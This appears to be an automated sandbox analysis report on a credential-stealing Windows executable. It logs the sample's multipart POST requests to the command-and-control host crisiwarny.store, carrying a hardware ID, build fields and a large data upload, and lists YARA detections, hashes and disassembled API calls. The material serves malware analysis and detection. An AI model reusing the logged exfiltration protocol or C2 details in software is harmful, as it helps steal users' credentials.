                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CQxcT2VfI3RyKHefXZgeFigv1gOr8eXEk9T97IAjYwVS0a6CJkPFvaRhLKofFnbmen%2B6Ww8wD2xIFQQIdQIC%2FoqyjsNSS%2FVowhz6FbV6cUP3BcelQgMiyuR3ChEzjOnAyNX9"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e2fdf4e763aaa-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1283&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=2203957&cwnd=244&unsent_bytes=0&cid=c44d1b39e0a098d9&ts=510&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49702 | 172.67.170.64 | 443 | 6636 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 23:22:13 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 12849
                                                                                        Host: crisiwarny.store
2024-10-26 23:22:13 UTC | 12849 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 32 46 43 44 36 43 38 30 34 39 36 41 43 42 36 35 45 34 36 36 46 41 32 43 33 41 44 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

BC02FCD6C80496ACB65E466FA2C3ADFE
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
                                                                                        2024-10-26 23:22:14 UTC1012INHTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=qiu07s6nfqfiu7t4420dhd20aq; expires=Wed, 19 Feb 2025 17:08:53 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FeVZCXZc%2FbaTn%2FWOr2HtjChA4TPbnHi1KMqxtixWTs9ZDCKk1KkOZJNXL3giVS34ClPnZmo5a%2BwCr4PQZeqMhUNCFhCjZ8jZ75BHuT54MDjz7dLrzyXH8qdM4rCFm2YVYe2Y"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e2fecc9070b7a-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1334&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13789&delivery_rate=2113868&cwnd=237&unsent_bytes=0&cid=d5e6f1cdb847f1b3&ts=796&x=0"
                                                                                        2024-10-26 23:22:14 UTC | 23 | IN | Data Ascii:
                                                                                        11
                                                                                        ok 173.254.250.68
                                                                                        2024-10-26 23:22:14 UTC | 5 | IN | Data Ascii:
                                                                                        0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        3 | 192.168.2.7 | 49703 | 172.67.170.64 | 443 | 6636 | C:\Users\user\Desktop\file.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-26 23:22:15 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 15081
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-26 23:22:15 UTC | 15081 | OUT | Data Ascii:
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="hwid"

                                                                                        BC02FCD6C80496ACB65E466FA2C3ADFE
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="pid"

                                                                                        2
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="lid"

                                                                                        4SD0y4--legen
                                                                                        2024-10-26 23:22:15 UTC | 1013 | IN | HTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:15 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=gsgd51fsjtku2q3oa9a18lc5oi; expires=Wed, 19 Feb 2025 17:08:54 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5TxnrrO4BbQPBjE7thIsXpJQvQRA8%2Bd40a5bCNbzjvz0JdK2tMtSDJw6xrQZqnf4oM61vsixwtiz05kTSkyhTFxoOxb3jYXN6aKOeLMZf%2FKo%2BamnX8zVRKg2pM7ASy1Zy%2BIb"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e2ff66ea245e4-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1199&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16021&delivery_rate=2419381&cwnd=250&unsent_bytes=0&cid=9cb9e6a019645d86&ts=597&x=0"
                                                                                        2024-10-26 23:22:15 UTC | 23 | IN | Data Ascii:
                                                                                        11
                                                                                        ok 173.254.250.68
                                                                                        2024-10-26 23:22:15 UTC | 5 | IN | Data Ascii:
                                                                                        0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        4 | 192.168.2.7 | 49705 | 172.67.170.64 | 443 | 6636 | C:\Users\user\Desktop\file.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-26 23:22:16 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 20406
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-26 23:22:16 UTC | 15331 | OUT | Data Ascii:
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="hwid"

                                                                                        BC02FCD6C80496ACB65E466FA2C3ADFE
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="pid"

                                                                                        3
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="lid"

                                                                                        4SD0y4--legen
                                                                                        2024-10-26 23:22:17 UTC | 1017 | IN | HTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=sb3eo9n3sta25ka0ehm46bh8v2; expires=Wed, 19 Feb 2025 17:08:56 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=14LIZ%2Bt4QX9y3nWK7TvbwDL%2BOrtIBY4BmS6rFiQFQd2E8VuQ0XzA0Wv7DOGhYdD5O%2F7M2yHN%2BUDBXUMidNWOaag%2FgDDJhXToIxM9dkku51gOFUq2Uq36ky0ZxXLeqBlQP%2F3U"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e2fff98862e6b-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2029&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21368&delivery_rate=1384983&cwnd=251&unsent_bytes=0&cid=20762f722f3f956c&ts=703&x=0"
                                                                                        2024-10-26 23:22:17 UTC | 23 | IN | Data Ascii:
                                                                                        11
                                                                                        ok 173.254.250.68
                                                                                        2024-10-26 23:22:17 UTC | 5 | IN | Data Ascii:
                                                                                        0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        5 | 192.168.2.7 | 49711 | 172.67.170.64 | 443 | 6636 | C:\Users\user\Desktop\file.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-26 23:22:18 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1242
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-26 23:22:18 UTC | 1242 | OUT | Data Ascii:
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="hwid"

                                                                                        BC02FCD6C80496ACB65E466FA2C3ADFE
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="pid"

                                                                                        1
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="lid"

                                                                                        4SD0y4--legen
                                                                                        2024-10-26 23:22:18 UTC | 1016 | IN | HTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=jjube5doq3f6rvlaegov931rhu; expires=Wed, 19 Feb 2025 17:08:57 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2BkVbxI%2Bl3bxorqecYVn239%2B09ohEkVcWgqKl6shKSTmlwzS77bWgo7uMjkM54gMGcqOlzBjjOoz2mndstYRQtGU41J%2B7tNsy9gj21gOt2oeOho7w96L0X1qc%2B%2FJRKu%2FHdPa"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e300a4dc96ba9-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1129&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2159&delivery_rate=2649588&cwnd=251&unsent_bytes=0&cid=d3c057755f8cbf0a&ts=362&x=0"
                                                                                        2024-10-26 23:22:18 UTC | 23 | IN | Data Ascii:
                                                                                        11
                                                                                        ok 173.254.250.68
                                                                                        2024-10-26 23:22:18 UTC | 5 | IN | Data Ascii:
                                                                                        0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        6 | 192.168.2.7 | 49722 | 172.67.170.64 | 443 | 6636 | C:\Users\user\Desktop\file.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-26 23:22:19 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 581658
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-26 23:22:19 UTC | 15331 | OUT | Data Ascii:
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="hwid"

                                                                                        BC02FCD6C80496ACB65E466FA2C3ADFE
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="pid"

                                                                                        1
                                                                                        --be85de5ipdocierre1
                                                                                        Content-Disposition: form-data; name="lid"

                                                                                        4SD0y4--legen
                                                                                        2024-10-26 23:22:24 UTC 1012 IN HTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=mtub4kghu1l9sj6mop4jv6ajra; expires=Wed, 19 Feb 2025 17:09:00 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWi8ioduehfGZrZC2We8z2oVp6BOWN%2BnkQ4mrCOlJDuInxSZX%2FjqbMRsPpv9XblP6tFTumaGlkJy0rjoWd4z0ARtkD9ihx7ifxa2orDEtvz0gVeySxOHTWxj1qVR8EIrc1eu"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e30132ea8e736-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1384&sent=226&recv=629&lost=0&retrans=0&sent_bytes=2839&recv_bytes=584227&delivery_rate=2049539&cwnd=59&unsent_bytes=0&cid=e87c70b7fc4deb3a&ts=4414&x=0"



                                                                                        Target ID:1
                                                                                        Start time:19:22:07
                                                                                        Start date:26/10/2024
                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                        Imagebase:0x470000
                                                                                        File size:2'939'904 bytes
                                                                                        MD5 hash:89EB026B1E8B37DF60728D38B5BA98BA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1367227452.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1312488858.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1335200391.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1364978590.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1348830892.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1336432602.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1349179623.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1349466810.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1312424888.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1364471802.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1335230711.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1348810433.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true


                                                                                          Execution Graph

                                                                                          Execution Coverage:5.4%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:57.3%
                                                                                          Total number of Nodes:246
                                                                                          Total number of Limit Nodes:26

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &A-C$5Q<S$6$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$dc$eI?K$jabc
                                                                                          • API String ID: 0-600622405
                                                                                          • Opcode ID: e284a7a31720b81371ea60283e70b7001730d1baa65b831a1f027a04994089f2
                                                                                          • Instruction ID: 5b208a6059804183d060f48d381a912446aab6ddc66af6ec5c92a326f9c93a37
                                                                                          • Opcode Fuzzy Hash: e284a7a31720b81371ea60283e70b7001730d1baa65b831a1f027a04994089f2
                                                                                          • Instruction Fuzzy Hash: 5DD1277160C3918FC324CF65D4903ABBBE1ABC5304F18C96EE4D94B342D779890ACB96

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • SysAllocString.OLEAUT32(49FB4BE2), ref: 004ABD1D
                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004ABD68
                                                                                          • SysFreeString.OLEAUT32(?), ref: 004AC0A4
                                                                                          • SysFreeString.OLEAUT32(?), ref: 004AC0AA
                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,49FB4BE2,00000000,00000000,00000000,00000000), ref: 004AC0F7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                          • String ID: WC$ZQ
                                                                                          • API String ID: 1773362589-1722601914
                                                                                          • Opcode ID: ecd9dfa0692d2d960993815b823b72d74c226f22262a7c7d91a0e12fbcb4b662
                                                                                          • Instruction ID: 9cfe2c5b4f9aab75729ea8dd4af0ad7892a0225d1b5023a662023591cfd649d4
                                                                                          • Opcode Fuzzy Hash: ecd9dfa0692d2d960993815b823b72d74c226f22262a7c7d91a0e12fbcb4b662
                                                                                          • Instruction Fuzzy Hash: D2C1DC72A08341ABE310CF60D845B5FBBE5FFC6314F10896CF1849B2A1DB75990ACB86

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BG$Ehrd$RG$bG$crisiwarny.store$i[k]$n|of$txLL$G
                                                                                          • API String ID: 0-4129233017
                                                                                          • Opcode ID: 40f401c9f44581ca63b52642439a1ab59c7072fb9dc8f3c449264201d5d8cae4
                                                                                          • Instruction ID: fe96d80a29e20f4ade6a44ba52e82dbe2f7242af1cbb0aca65b38a260ce43606
                                                                                          • Opcode Fuzzy Hash: 40f401c9f44581ca63b52642439a1ab59c7072fb9dc8f3c449264201d5d8cae4
                                                                                          • Instruction Fuzzy Hash: C5022B755083408FD304DF26DC413ABBBF1EB99308F148A7DE5899B362D7398909CB5A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !m%k$#i4g$+e(c$@-+$crisiwarny.store$g!~_$v%r#$y)v'$yw
                                                                                          • API String ID: 0-2828184888
                                                                                          • Opcode ID: 2d2cf9de8f19b345753aca510332dd6a5fb3cfe6c724a0748b1c76e0390b7b0d
                                                                                          • Instruction ID: 7e9fd78be045040975057f9bf3314c80600c98f1ea3e7e66c59b4d01cee8bd81
                                                                                          • Opcode Fuzzy Hash: 2d2cf9de8f19b345753aca510332dd6a5fb3cfe6c724a0748b1c76e0390b7b0d
                                                                                          • Instruction Fuzzy Hash: 7BF188B111C3819FE3249F64D8847ABBBF4EB85300F108E2DEAD99B251D7798845CB96
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0049F9FB
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0049FABA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID: \X"Q$a|cI
                                                                                          • API String ID: 3545744682-3233608862
                                                                                          • Opcode ID: a5e2521f860c483e47f0de1bbce9b588581134c7f65efe4b1def1f890cea2b75
                                                                                          • Instruction ID: 21be232f55f6f009ce331f826d2611d81c834e32981f7d0bb3e18a8fc6fd1e98
                                                                                          • Opcode Fuzzy Hash: a5e2521f860c483e47f0de1bbce9b588581134c7f65efe4b1def1f890cea2b75
                                                                                          • Instruction Fuzzy Hash: 3E9203316047818FD7298F39C490762BFE2AF96314F28C6AEC4D68B792D739D806CB54

                                                                                          Control-flow Graph (legend: Executed, Not Executed)
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DG$Dw$Mx$n~$wE$qVw
                                                                                          • API String ID: 0-1111290910
                                                                                          • Opcode ID: 792db507c6e8eb407caf91159cfebecb54ff93e95f971f33409c5240e2e1963b
                                                                                          • Instruction ID: 30aa581a2466f192e878bf65e961f3196c805715b3ccf7b3bad0f8cedaf8a41f
                                                                                          • Opcode Fuzzy Hash: 792db507c6e8eb407caf91159cfebecb54ff93e95f971f33409c5240e2e1963b
                                                                                          • Instruction Fuzzy Hash: A9F1DCB16183408FD314DF25D89166BBBF0EF96318F048A2DF8958B391E7788906CB97

                                                                                          Control-flow Graph (legend: Executed, Not Executed)
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 5c;e$>kjm$A'K)$Jg3i$S;W=$i#E%
                                                                                          • API String ID: 0-468034204
                                                                                          • Opcode ID: 851d7784f4e681017bd4bac9898410057fc48233695c722e52c57286ee8047c5
                                                                                          • Instruction ID: 583837e7b042ed9de32b73232a8184b115d8b80cc2aa1b6596bd2d44c7d6cb52
                                                                                          • Opcode Fuzzy Hash: 851d7784f4e681017bd4bac9898410057fc48233695c722e52c57286ee8047c5
                                                                                          • Instruction Fuzzy Hash: C01264B4114700CFD3249F25D889BAABBB1FB45310F1686BCD59A9F6B2D770A809CF49

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $7$7$8$W
                                                                                          • API String ID: 0-4210289531
                                                                                          • Opcode ID: cc922712c674694d451b58b033e683881c0778a8a13bf93cc21134ebbdb2add8
                                                                                          • Instruction ID: d8815ac2d70cd7c21f3ea330daadc819f6f20b7799c4c74fa91532e269c1b94c
                                                                                          • Opcode Fuzzy Hash: cc922712c674694d451b58b033e683881c0778a8a13bf93cc21134ebbdb2add8
                                                                                          • Instruction Fuzzy Hash: B981F87260C7808BD724CA3CC85535FBFD2ABD5324F1E8A6ED4E5873C2D67888058746

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: >2%8$NFFV$]c\"
                                                                                          • API String ID: 0-36263332
                                                                                          • Opcode ID: a3d0304cc7e3a40def1825658326bbab0ba2cafd084bdbfda229e8f319f3e411
                                                                                          • Instruction ID: 2d561b42531285b061f51bc961fa656c28d97a9c364c5424ab32f6d1f29136a2
                                                                                          • Opcode Fuzzy Hash: a3d0304cc7e3a40def1825658326bbab0ba2cafd084bdbfda229e8f319f3e411
                                                                                          • Instruction Fuzzy Hash: 61F114745047828BD7258F2AC490723BBE2EFA7304F2C859EC4D68F7A2D7799806C765

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0047D1C7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID: 89
